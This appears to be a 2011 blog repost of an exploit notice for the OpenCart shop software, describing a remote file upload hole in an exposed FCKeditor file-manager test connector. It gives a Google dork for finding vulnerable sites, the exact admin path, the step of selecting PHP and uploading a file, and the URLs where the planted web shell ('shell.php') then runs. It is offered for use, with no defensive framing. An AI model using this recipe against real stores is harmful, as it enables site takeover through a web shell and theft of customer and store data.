Friday, April 1, 2011

Opencart remote file Upload Vulnerability

#Exploit Title: Opencart remote file uploade
#Google dork: [inurl:Powered By OpenCart
#Software Link: http://www.opencart.com/index.php?route=download/download
#Platform :linux/php
##################MagelangCyber################
# http://target.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
# Example site: http://server
# Select the “File Upload” To use = php
# http://server/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
# Sh3ll : http://server/admin/view/javascript/fckeditor/editor/filemanager/connectors/php/shell.php
# OR
# http://server/shell.php
#######################Demo Example####################
#Demo : http://www.site.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html#
#Demo : http://www.site.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html#

 

This Share Facebook Posted by at 9:28 PM

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)
Template by : mhiman@ hacker-newbie.org